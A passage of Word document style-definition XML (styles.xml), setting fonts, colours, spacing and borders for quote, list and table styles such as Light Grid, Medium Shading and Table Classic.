    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="4" w:space="4"/>
      </w:pBdr>
      <w:spacing w:before="200" w:after="280" w:line="288" w:lineRule="auto"/>
      <w:ind w:left="936" w:right="936"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="7E97AD" w:themeColor="accent1"/>
      <w:kern w:val="20"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ja-JP"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="accent1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="154">
    <w:name w:val="Intense Quote Char"/>
    <w:basedOn w:val="6"/>
    <w:link w:val="153"/>
    <w:uiPriority w:val="30"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="7E97AD" w:themeColor="accent1"/>
      <w:kern w:val="20"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ja-JP"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="accent1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="155">
    <w:name w:val="A218B64594EF4F23B56A76968126AE74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6">
    <w:name w:val="FCACD00627B3430BB5CB58EF4600076F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7">
    <w:name w:val="F6854632AAAA46AB8097879A124295D5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8">
    <w:name w:val="A501E0E1225047A5B50D018BF35ADAF8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9">
    <w:name w:val="5ECF4EE936C74201AD5935A4F57DB34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0">
    <w:name w:val="68A89D3299B44E1FA45AE56B6F66D6C9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61">
    <w:name w:val="Light Grid Accent 5"/>
    <w:basedOn w:val="7"/>
    <w:uiPriority w:val="62"/>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67787B" w:themeColor="accent5" w:sz="8" w:space="0"/>
          <w:left w:val="single" w:color="67787B" w:themeColor="accent5" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="67787B" w:themeColor="accent5" w:sz="18" w:space="0"/>
          <w:right w:val="single" w:color="67787B"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67787B" w:themeColor="accent5" w:sz="6" w:space="0"/>
          <w:left w:val="single" w:color="67787B" w:themeColor="accent5" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="67787B" w:themeColor="accent5" w:sz="8" w:space="0"/>
          <w:right w:val="single" w:color="67787B"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Vert">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shd w:val="clear" w:color="auto" w:fill="D8DEDF" w:themeFill="accent5" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">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shd w:val="clear" w:color="auto" w:fill="D8DEDF" w:themeFill="accent5" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">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tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="162">
    <w:name w:val="E7CA190A1A364E5894DB7323BAEA5D26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63">
    <w:name w:val="Light List"/>
    <w:basedOn w:val="7"/>
    <w:uiPriority w:val="61"/>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000000" w:themeFill="text1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:r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paragraph" w:customStyle="1" w:styleId="164">
    <w:name w:val="FEC0977598A343FB83EB31C89803F968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5">
    <w:name w:val="41A52E6CC3BE4949A71B65C8E871BA814"/>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66">
    <w:name w:val="19C492744CD04767AD335F13593D9864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7">
    <w:name w:val="9979C8729CB544D3A7B3D4580D01102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8">
    <w:name w:val="D3EFC4412A184A048F418229630F803C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9">
    <w:name w:val="2D337D0626914617BCBCB5B23968F2A8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0">
    <w:name w:val="79A87265940A4E53873725400795B7CC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1">
    <w:name w:val="E97057898B1D40DD81476210C44AD2A4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2">
    <w:name w:val="8791A301A35E463D8850C93BBF9164F8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3">
    <w:name w:val="C6FB9B6F408A4E0A9597FBFFAF9E9309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4">
    <w:name w:val="2EA0DC5420504DAE8273F1CE0FEBE889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5">
    <w:name w:val="9BC6F46848AF49E988559BC01BBF8D1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6">
    <w:name w:val="A8DEB0FC71F2449C96A718E9CF8135AA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7">
    <w:name w:val="B05E969606664CCC84D6FDC3B88A2E95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8">
    <w:name w:val="5DEA62D16AC6422E937A8777371C93705"/>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179">
    <w:name w:val="7DA331C4651141A79F4D5AF832ABD05C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80">
    <w:name w:val="List 5"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="40" w:after="160" w:line="288" w:lineRule="auto"/>
      <w:ind w:left="1800"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81">
    <w:name w:val="8C28D5823AF7477A9BC27AF476E1C4B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82">
    <w:name w:val="List Bullet 3"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1080"/>
      </w:tabs>
      <w:spacing w:before="40" w:after="160" w:line="288" w:lineRule="auto"/>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83">
    <w:name w:val="A218B64594EF4F23B56A76968126AE74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4">
    <w:name w:val="FCACD00627B3430BB5CB58EF4600076F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5">
    <w:name w:val="F6854632AAAA46AB8097879A124295D5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6">
    <w:name w:val="A501E0E1225047A5B50D018BF35ADAF8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7">
    <w:name w:val="5ECF4EE936C74201AD5935A4F57DB34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8">
    <w:name w:val="68A89D3299B44E1FA45AE56B6F66D6C9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89">
    <w:name w:val="List Continue 5"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="40" w:after="120" w:line="288" w:lineRule="auto"/>
      <w:ind w:left="180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90">
    <w:name w:val="E7CA190A1A364E5894DB7323BAEA5D26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91">
    <w:name w:val="List Number"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:spacing w:before="40" w:after="160" w:line="288" w:lineRule="auto"/>
      <w:ind w:left="360"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2">
    <w:name w:val="List Number 2"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="432"/>
      </w:tabs>
      <w:spacing w:before="40" w:after="160" w:line="288" w:lineRule="auto"/>
      <w:ind w:left="432" w:hanging="432"/>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3">
    <w:name w:val="List Number 3"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="18"/>
    <w:pPr>
      <w:spacing w:before="40" w:after="160" w:line="288" w:lineRule="auto"/>
      <w:ind w:left="792"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4">
    <w:name w:val="List Number 4"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="18"/>
    <w:pPr>
      <w:spacing w:before="40" w:after="160" w:line="288" w:lineRule="auto"/>
      <w:ind w:left="1152"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5">
    <w:name w:val="List Number 5"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="18"/>
    <w:pPr>
      <w:spacing w:before="40" w:after="160" w:line="288" w:lineRule="auto"/>
      <w:ind w:left="1512"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96">
    <w:name w:val="FEC0977598A343FB83EB31C89803F968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97">
    <w:name w:val="41A52E6CC3BE4949A71B65C8E871BA815"/>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98">
    <w:name w:val="19C492744CD04767AD335F13593D9864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99">
    <w:name w:val="9979C8729CB544D3A7B3D4580D01102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0">
    <w:name w:val="D3EFC4412A184A048F418229630F803C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1">
    <w:name w:val="2D337D0626914617BCBCB5B23968F2A8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2">
    <w:name w:val="79A87265940A4E53873725400795B7CC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3">
    <w:name w:val="E97057898B1D40DD81476210C44AD2A4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4">
    <w:name w:val="8791A301A35E463D8850C93BBF9164F8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5">
    <w:name w:val="C6FB9B6F408A4E0A9597FBFFAF9E9309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6">
    <w:name w:val="2EA0DC5420504DAE8273F1CE0FEBE889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7">
    <w:name w:val="9BC6F46848AF49E988559BC01BBF8D1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8">
    <w:name w:val="A8DEB0FC71F2449C96A718E9CF8135AA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9">
    <w:name w:val="B05E969606664CCC84D6FDC3B88A2E95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0">
    <w:name w:val="5DEA62D16AC6422E937A8777371C93706"/>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11">
    <w:name w:val="7DA331C4651141A79F4D5AF832ABD05C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12">
    <w:name w:val="Medium Grid 2 Accent 3"/>
    <w:basedOn w:val="7"/>
    <w:uiPriority w:val="68"/>
    <w:pPr>
      <w:spacing w:before="40" w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ja-JP"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
    <w:tblPr>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color w:val="000000" w:themeColor="text1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="tx1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F0EE" w:themeFill="accent3"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E5E0DE" w:themeFill="accent3" w:themeFillTint="33"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="BEB4AD" w:themeFill="accent3" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tcPr>
        <w:tcBorders>
          <w:insideH w:val="single" w:sz="6" w:space="0"/>
          <w:insideV w:val="single" w:sz="6" w:space="0"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="BEB4AD" w:themeFill="accent3" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="nwCell">
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="213">
    <w:name w:val="8C28D5823AF7477A9BC27AF476E1C4B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14">
    <w:name w:val="Medium Grid 2 Accent 5"/>
    <w:basedOn w:val="7"/>
    <w:uiPriority w:val="68"/>
    <w:pPr>
      <w:spacing w:before="40" w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ja-JP"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>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color w:val="000000" w:themeColor="text1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="tx1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EFF1F2" w:themeFill="accent5"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E0E4E5" w:themeFill="accent5" w:themeFillTint="33"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="B2BCBE" w:themeFill="accent5" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tcPr>
        <w:tcBorders>
          <w:insideH w:val="single" w:sz="6" w:space="0"/>
          <w:insideV w:val="single" w:sz="6" w:space="0"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="B2BCBE" w:themeFill="accent5" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="nwCell">
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="215">
    <w:name w:val="A218B64594EF4F23B56A76968126AE74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6">
    <w:name w:val="FCACD00627B3430BB5CB58EF4600076F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7">
    <w:name w:val="F6854632AAAA46AB8097879A124295D5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8">
    <w:name w:val="A501E0E1225047A5B50D018BF35ADAF8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9">
    <w:name w:val="5ECF4EE936C74201AD5935A4F57DB34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0">
    <w:name w:val="68A89D3299B44E1FA45AE56B6F66D6C9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21">
    <w:name w:val="Medium Grid 3 Accent 5"/>
    <w:basedOn w:val="7"/>
    <w:uiPriority w:val="69"/>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67787B" w:themeFill="accent5"/>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67787B" w:themeFill="accent5"/>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67787B" w:themeFill="accent5"/>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67787B" w:themeFill="accent5"/>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2BCBE" w:themeFill="accent5"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2BCBE" w:themeFill="accent5" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="222">
    <w:name w:val="E7CA190A1A364E5894DB7323BAEA5D26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23">
    <w:name w:val="Medium List 1 Accent 4"/>
    <w:basedOn w:val="7"/>
    <w:uiPriority w:val="65"/>
    <w:pPr>
      <w:spacing w:before="40" w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ja-JP"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
        <w:bottom w:val="single" w:color="B4936D" w:themeColor="accent4"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B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="1F2123" w:themeColor="text2"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="tx2"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="ECE4DA" w:themeFill="accent4" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="ECE4DA" w:themeFill="accent4" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="224">
    <w:name w:val="FEC0977598A343FB83EB31C89803F968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5">
    <w:name w:val="41A52E6CC3BE4949A71B65C8E871BA816"/>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226">
    <w:name w:val="19C492744CD04767AD335F13593D98646"/>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7">
    <w:name w:val="9979C8729CB544D3A7B3D4580D0110226"/>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8">
    <w:name w:val="D3EFC4412A184A048F418229630F803C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9">
    <w:name w:val="2D337D0626914617BCBCB5B23968F2A8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0">
    <w:name w:val="79A87265940A4E53873725400795B7CC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1">
    <w:name w:val="E97057898B1D40DD81476210C44AD2A46"/>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2">
    <w:name w:val="8791A301A35E463D8850C93BBF9164F86"/>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3">
    <w:name w:val="C6FB9B6F408A4E0A9597FBFFAF9E93096"/>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4">
    <w:name w:val="2EA0DC5420504DAE8273F1CE0FEBE889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5">
    <w:name w:val="9BC6F46848AF49E988559BC01BBF8D1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6">
    <w:name w:val="A8DEB0FC71F2449C96A718E9CF8135AA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7">
    <w:name w:val="B05E969606664CCC84D6FDC3B88A2E95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8">
    <w:name w:val="5DEA62D16AC6422E937A8777371C93707"/>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39">
    <w:name w:val="7DA331C4651141A79F4D5AF832ABD05C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40">
    <w:name w:val="Medium Shading 2"/>
    <w:basedOn w:val="7"/>
    <w:uiPriority w:val="64"/>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000000" w:themeFill="text1"/>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paragraph" w:customStyle="1" w:styleId="241">
    <w:name w:val="8C28D5823AF7477A9BC27AF476E1C4B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42">
    <w:name w:val="Medium Shading 2 Accent 2"/>
    <w:basedOn w:val="7"/>
    <w:uiPriority w:val="64"/>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CC8E60" w:themeFill="accent2"/>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CC8E60" w:themeFill="accent2"/>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CC8E60" w:themeFill="accent2"/>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paragraph" w:customStyle="1" w:styleId="243">
    <w:name w:val="A218B64594EF4F23B56A76968126AE74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4">
    <w:name w:val="FCACD00627B3430BB5CB58EF4600076F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5">
    <w:name w:val="F6854632AAAA46AB8097879A124295D5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6">
    <w:name w:val="A501E0E1225047A5B50D018BF35ADAF8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7">
    <w:name w:val="5ECF4EE936C74201AD5935A4F57DB34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8">
    <w:name w:val="68A89D3299B44E1FA45AE56B6F66D6C9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249">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="40" w:after="160" w:line="288" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsiaTheme="minorHAnsi"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:kern w:val="20"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ja-JP"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1">
            <w14:lumMod w14:val="65000"/>
            <w14:lumOff w14:val="35000"/>
          </w14:schemeClr>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="250">
    <w:name w:val="E7CA190A1A364E5894DB7323BAEA5D26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251">
    <w:name w:val="Note Heading"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="252"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="40" w:after="0" w:line="240"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character" w:customStyle="1" w:styleId="252">
    <w:name w:val="Note Heading Char"/>
    <w:basedOn w:val="6"/>
    <w:link w:val="251"/>
    <w:semiHidden/>
    <w:uiPriority w:val="99"/>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253">
    <w:name w:val="FEC0977598A343FB83EB31C89803F968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4">
    <w:name w:val="41A52E6CC3BE4949A71B65C8E871BA817"/>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255">
    <w:name w:val="19C492744CD04767AD335F13593D9864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6">
    <w:name w:val="9979C8729CB544D3A7B3D4580D01102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7">
    <w:name w:val="D3EFC4412A184A048F418229630F803C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8">
    <w:name w:val="2D337D0626914617BCBCB5B23968F2A87"/>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9">
    <w:name w:val="79A87265940A4E53873725400795B7CC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0">
    <w:name w:val="E97057898B1D40DD81476210C44AD2A4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1">
    <w:name w:val="8791A301A35E463D8850C93BBF9164F8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2">
    <w:name w:val="C6FB9B6F408A4E0A9597FBFFAF9E9309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3">
    <w:name w:val="2EA0DC5420504DAE8273F1CE0FEBE889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4">
    <w:name w:val="9BC6F46848AF49E988559BC01BBF8D1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5">
    <w:name w:val="A8DEB0FC71F2449C96A718E9CF8135AA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6">
    <w:name w:val="B05E969606664CCC84D6FDC3B88A2E95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7">
    <w:name w:val="5DEA62D16AC6422E937A8777371C93708"/>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68">
    <w:name w:val="7DA331C4651141A79F4D5AF832ABD05C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69">
    <w:name w:val="Table Classic 1"/>
    <w:basedOn w:val="7"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="40" w:after="160" w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ja-JP"/>
    </w:r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i/>
        <w:iCs/>
      </w:rPr>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="000000" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:color w:val="auto"/>
      </w:rPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="000000" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:tcPr>
        <w:tcBorders>
          <w:right w:val="single" w:color="000000" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="neCell">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
      </w:rPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="swCell">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="270">
    <w:name w:val="8C28D5823AF7477A9BC27AF476E1C4B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71">
    <w:name w:val="Table Classic 3"/>
    <w:basedOn w:val="7"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="40" w:after="160" w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
      <w:color w:val="000080"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ja-JP"/>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cPr>
      <w:shd w:val="solid" w:color="C0C0C0" w:fill="FFFFFF"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:i/>
        <w:iCs/>
        <w:color w:val="FFFFFF"/>
      </w:rPr>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="000000" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="solid" w:color="000080" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:color w:val="000080"/>
      </w:rPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="000000" w:sz="12" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="solid" w:color="FFFFFF" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="000000"/>
      </w:rPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="272">
    <w:name w:val="A218B64594EF4F23B56A76968126AE74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3">
    <w:name w:val="FCACD00627B3430BB5CB58EF4600076F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4">
    <w:name w:val="F6854632AAAA46AB8097879A124295D5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5">
    <w:name w:val="A501E0E1225047A5B50D018BF35ADAF8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6">
    <w:name w:val="5ECF4EE936C74201AD5935A4F57DB34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7">
    <w:name w:val="68A89D3299B44E1FA45AE56B6F66D6C9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78">
    <w:name w:val="Table Columns 3"/>
    <w:basedOn w:val="7"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="40" w:after="160" w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ja-JP"/>
    </w:rPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="000080" w:sz="6" w:space="0"/>
        <w:left w:val="single" w:color="000080" w:sz="6" w:space="0"/>
        <w:bottom w:val="single" w:color="000080" w:sz="6" w:space="0"/>
        <w:right w:val="single" w:color="000080" w:sz="6" w:space="0"/>
        <w:insideV w:val="single" w:color="000080" w:sz="6" w:space="0"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:color w:val="FFFFFF"/>
      </w:rPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="solid" w:color="000080" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
      </w:rPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="000080" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
      </w:rPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
      </w:rPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:rPr>
        <w:color w:val="auto"/>
      </w:rPr>
      <w:tcPr>
        <w:shd w:val="solid" w:color="C0C0C0" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:rPr>
        <w:color w:val="auto"/>
      </w:rPr>
      <w:tcPr>
        <w:shd w:val="pct10" w:color="000000" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="neCell">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="279">
    <w:name w:val="E7CA190A1A364E5894DB7323BAEA5D26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80">
    <w:name w:val="Table Contemporary"/>
    <w:basedOn w:val="7"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="40" w:after="160" w:line="30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insideH w:val="single" w:color="FFFFFF" w:sz="18" w:space="0"/>
        <w:insideV w:val="single" w:color="FFFFFF" w:sz="18" w:space="0"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
